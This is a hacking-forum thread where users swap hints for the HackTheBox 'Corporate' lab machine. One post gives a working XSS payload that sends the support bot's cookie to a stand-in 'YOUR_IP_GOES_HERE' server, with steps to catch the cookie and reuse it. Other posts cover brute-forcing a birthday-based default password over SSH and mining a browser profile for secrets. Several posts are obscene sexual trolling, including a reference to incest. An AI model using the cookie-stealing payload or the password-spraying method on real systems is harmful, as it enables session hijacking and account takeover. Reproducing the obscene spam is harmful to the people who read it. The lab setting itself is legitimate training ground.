Corporate - HTB
by chillywilly - Saturday December 16, 2023 at 06:06 PM
#51
(12-22-2023, 01:35 AM)Azad23 Wrote:
(12-22-2023, 12:05 AM)fatgirl Wrote: i found these users but they're vegan so i dont want them and u can have them
jammie.corkery@corporate.htb ward.pfannerstill@corporate.htb oleta.gutmann@corporate.htb kian.rodriguez@corporate.htb jacey.bernhard@corporate.htb veda.kemmer@corporate.htb raphael.adams@corporate.htb stevie.rosenbaum@corporate.htb halle.keeling@corporate.htb ross.leffler@corporate.htb marcella.kihn@corporate.htb joy.gorczany@corporate.htb larissa.wilkinson@corporate.htb skye.will@corporate.htb gideon.daugherty@corporate.htb amie.torphy@corporate.htb katelyn.swift@corporate.htb lila.mcglynn@corporate.htb estelle.padberg@corporate.htb kacey.krajcik@corporate.htb tanner.kuvalis@corporate.htb elwin.jones@corporate.htb anastasia.nader@corporate.htb morris.lowe@corporate.htb leanne.runolfsdottir@corporate.htb gayle.graham@corporate.htb dylan.schumm@corporate.htb richie.cormier@corporate.htb marge.frami@corporate.htb erna.lindgren@corporate.htb callie.goldner@corporate.htb uriel.hahn@corporate.htb ally.effertz@corporate.htb annamarie.flatley@corporate.htb candido.mcdermott@corporate.htb scarlett.herzog@corporate.htb estrella.wisoky@corporate.htb adrianna.stehr@corporate.htb abbigail.halvorson@corporate.htb august.gottlieb@corporate.htb harley.ratke@corporate.htb laurie.casper@corporate.htb arch.ryan@corporate.htb dayne.ruecker@corporate.htb abigayle.kessler@corporate.htb katelin.keeling@corporate.htb penelope.mcclure@corporate.htb rachelle.langworth@corporate.htb america.kirlin@corporate.htb garland.denesik@corporate.htb cathryn.weissnat@corporate.htb elwin.mills@corporate.htb beth.feest@corporate.htb mohammed.feeney@corporate.htb bethel.hessel@corporate.htb nya.little@corporate.htb kasey.walsh@corporate.htb stephen.schamberger@corporate.htb dessie.wolf@corporate.htb mabel.koepp@corporate.htb christian.spencer@corporate.htb esperanza.kihn@corporate.htb justyn.beahan@corporate.htb josephine.hermann@corporate.htb sadie.greenfelder@corporate.htb zaria.kozey@corporate.htb antwan.bernhard@corporate.htb hector.king@corporate.htb brody.wiza@corporate.htb jammie.corkery@corporate.htb hermina.leuschke@corporate.htb julio.daniel@corporate.htb candido.hackett@corporate.htb dangelo.koch@corporate.htb nora.brekke@corporate.htb margarette.baumbach@corporate.htb michale.jakubowski@corporate.htb cecelia.west@corporate.htb rosalee.schmitt@corporate.htb
List need a little rework to make it useful .... but if someone here had done the box whiteout copy-paste(which i doubt  ) ... there no need of a list ... one bot will expose itself Big Grin 

anyway make  a lil bash script do not hurt ..

uh seems you and other are going wild whit writeups popping out .... hope at least the copy-paste bois are learning something cuz this box as loooot to teach

Super new here, so sorry if I pollute the world with my ignorance but managed to make it to people and get the ovpn going. Can see ldap but not successfully connect ~.~
Reply
#52
hello,

Here is the description, roles and date of birth for each users: https://pastebin.com/D1U1dZa6
I think we have to crack a user password with these informations but for now I have to go to sleep .. Smile
Reply
#53
Any hints for priv esc?
Reply
#54
(12-22-2023, 02:47 AM)magway Wrote:
Quote:I have not even gotten past people, and i am stuck. I think something with IDOR in the sharing files, but I dont know what to do.

Yes, it's IDOR in file sharing between people  i'm pretty confident about it. but still cannot find the right way to do it.
Any findings from hacktricks and Payload All the Fings i'm attempting to do  fails.. it's somewhat trickier.
Anybody who rooted might give some little help ?
no its not idor its indor have you looked in the sausage wallet? there should be a way in to get users. the pdf is in the word document. you just have to find it.

(12-21-2023, 07:01 PM)hotsweatyandready Wrote:
(12-21-2023, 06:46 PM)fatgirl Wrote:
(12-21-2023, 06:10 PM)hotsweatyandready Wrote:
(12-21-2023, 05:44 PM)fatgirl Wrote:
(12-21-2023, 10:35 AM)hotsweatyandready Wrote:
<a href="http://corporate.htb/<script+src='/vendor/analytics.min.js'></script><script+src='/assets/js/analytics.min.js?v=document.location=`http://YOUR_IP_GOES_HERE:80/${document.cookie}`'</script>" id="send-message">

This is my payload as a message sent to the support chat bot. It will redirect the bot to another page that is vulnerable to xss and from there will leak the cookie to your http web server. Of course replace the YOUR_IP_GOES_HERE with your own provided IP. After this you will have to continue to people subdomain and add the stolen cookie into the browser.

i got the cookie but i ate it. i just couldn't help myself. can u give me yours so i can use it without putting my ip address in. idk how to do that and i wish i didnt eat the cookie but here we are.

You need to know how to do these things yourself, or you will end up lost in the next step. I didnt use my public IP address. I used the one you get from connecting to the hackthebox VPN because the VPN from HTB has sandbox environment protection. Understandable If you are worried about using your IP.

Spin up a simple http server with python:
python3 -m http.server 8000

use my script and put the provided HacktheBox VPN IP in it. make sure the script is going to the right port too. like 8000 instead of 80.

Every cookie is different and have expiration time. Posting the cookies I retrieve will be useless to you.



I have not even gotten past people, and i am stuck. I think something with IDOR in the sharing files, but I dont know what to do.


it's okay i dont need your help anymore.  i just put extra mayonaise on my panties and mailed them at another hacker's request, but at least i got the flag and i get to keep my donuts

as promised i'm on the next greyhound with five gallons of frozen crab meat and a wet pussy. see you in canada hackers. thanks for all the help from all who dm'd me. sorry my pussy wasn't super wet today my grandfather just got done with it before i got on cam.

lmao, this is definitely going into my copypasta archives
no thats my woman you cant copy it! you have to eat the crab meat right out the pussy. use it for dipping sauce. see when their nice and fat their nice and plump let hem marinate on the couch for a little while and sweat add some tang to the flavoring.
Reply
#55
(12-22-2023, 02:33 AM)lethalwarrior619 Wrote: Any hints for priv esc?
ya im still working on it, so far you have to have privs first to escape. but what i figured out, you have to steal all the cookies before fatgirl eats em. so what you do is open many browser sessions, make a lot of tickets, grab all the cookies. then you have to go to sso and then login with the cookies that arent half eaten. then you have to get vpn, when you get vpn you have to use ldap. ldap is really means learning disability and pussy lots of pussy like what i get from fatgirl when i eat her frozen crablegs she thaws out inside her to make marination. but anyways once you completed the ldap you should have root.
Reply
#56
I brute forced all the employees and their birthdays and got into one of their 'corporate workstations' - user key acquired! This is actually my first user key and HTB. Going for root!
Reply
#57
(12-22-2023, 07:07 AM)yonigga Wrote:
(12-22-2023, 05:34 AM)fatgirl Wrote:
(12-22-2023, 04:35 AM)hotsweatyandready Wrote:
(12-22-2023, 04:24 AM)suxalottapuss Wrote:
(12-22-2023, 02:47 AM)magway Wrote: Yes, it's IDOR in file sharing between people  i'm pretty confident about it. but still cannot find the right way to do it.
Any findings from hacktricks and Payload All the Fings i'm attempting to do  fails.. it's somewhat trickier.
Anybody who rooted might give some little help ?
no its not idor its indor have you looked in the sausage wallet? there should be a way in to get users. the pdf is in the word document. you just have to find it.

(12-21-2023, 07:01 PM)hotsweatyandready Wrote: lmao, this is definitely going into my copypasta archives
no thats my woman you cant copy it! you have to eat the crab meat right out the pussy. use it for dipping sauce. see when their nice and fat their nice and plump let hem marinate on the couch for a little while and sweat add some tang to the flavoring.

So what you are saying is that we need to download all of the DOCX files and find the one hiding the pdf that includes some secret?



(12-22-2023, 04:34 AM)fatgirl Wrote: if u are a fat guy with tits who knows c++ hmu i got a question
I wish I was fat with big old titties. Im flatter than old beer

(12-22-2023, 05:26 AM)yonigga Wrote:
(12-22-2023, 05:07 AM)fatgirl Wrote: this guy is a 'sysadmin'. maybe he should be hacked

http://people.corporate.htb/employee/5007
[Image: 9rhkvy8.png]

i am not able to ssh sysadmin@corporate.htb : CorporateStarter10201987

idk because i log into a different box @10.9.0.4

Tried that as well with both email username and role

└─$ ssh sysadmin@10.9.0.4   
sysadmin@10.9.0.4's password: CorporateStarter10201987
Permission denied, please try again.
sysadmin@10.9.0.4's password:


└─$ ssh stevie.rosenbaum@10.9.0.4
stevie.rosenbaum@10.9.0.4's password: CorporateStarter10201987
Permission denied, please try again.
stevie.rosenbaum@10.9.0.4's password:

I already have the user flag- i need sysadmin for root and i am not able to ssh it

There was another address showing up on my scans, maybe it's a switcheroo
Reply
#58
(12-22-2023, 10:37 AM)manamana Wrote: any more hit for root? stuck a long times QAQ

~/.mozilla has some interesting files.
Reply
#59
(12-22-2023, 05:34 AM)fatgirl Wrote:
(12-22-2023, 04:35 AM)hotsweatyandready Wrote:
(12-22-2023, 04:24 AM)suxalottapuss Wrote:
(12-22-2023, 02:47 AM)magway Wrote:
Quote:I have not even gotten past people, and i am stuck. I think something with IDOR in the sharing files, but I dont know what to do.

Yes, it's IDOR in file sharing between people  i'm pretty confident about it. but still cannot find the right way to do it.
Any findings from hacktricks and Payload All the Fings i'm attempting to do  fails.. it's somewhat trickier.
Anybody who rooted might give some little help ?
no its not idor its indor have you looked in the sausage wallet? there should be a way in to get users. the pdf is in the word document. you just have to find it.

(12-21-2023, 07:01 PM)hotsweatyandready Wrote:
(12-21-2023, 06:46 PM)fatgirl Wrote: it's okay i dont need your help anymore.  i just put extra mayonaise on my panties and mailed them at another hacker's request, but at least i got the flag and i get to keep my donuts

as promised i'm on the next greyhound with five gallons of frozen crab meat and a wet pussy. see you in canada hackers. thanks for all the help from all who dm'd me. sorry my pussy wasn't super wet today my grandfather just got done with it before i got on cam.

lmao, this is definitely going into my copypasta archives
no thats my woman you cant copy it! you have to eat the crab meat right out the pussy. use it for dipping sauce. see when their nice and fat their nice and plump let hem marinate on the couch for a little while and sweat add some tang to the flavoring.

So what you are saying is that we need to download all of the DOCX files and find the one hiding the pdf that includes some secret?



(12-22-2023, 04:34 AM)fatgirl Wrote: if u are a fat guy with tits who knows c++ hmu i got a question
I wish I was fat with big old titties. Im flatter than old beer

(12-22-2023, 05:26 AM)yonigga Wrote:
(12-22-2023, 05:07 AM)fatgirl Wrote: this guy is a 'sysadmin'. maybe he should be hacked

http://people.corporate.htb/employee/5007
[Image: 9rhkvy8.png]

i am not able to ssh sysadmin@corporate.htb : CorporateStarter10201987

idk because i log into a different box @10.9.0.4

bring the crab legs i wanna login to your box
Reply
#60
(12-22-2023, 11:25 AM)hotsweatyandready Wrote: I connected to the vpn from the user I stole the cookie. Went and tried every user@corporate.htb and CorporateStarter[dateofbirth] combination without much luck. I wish I knew what to do and where CorporateStarter + birth date came from.

Make sure you're connected through the tunnel, and hitting the right machine via SSH (nmap to scan for the others)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 90,916 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 4,383 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 9,546 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 2,369 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 2,667 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 2 Guest(s)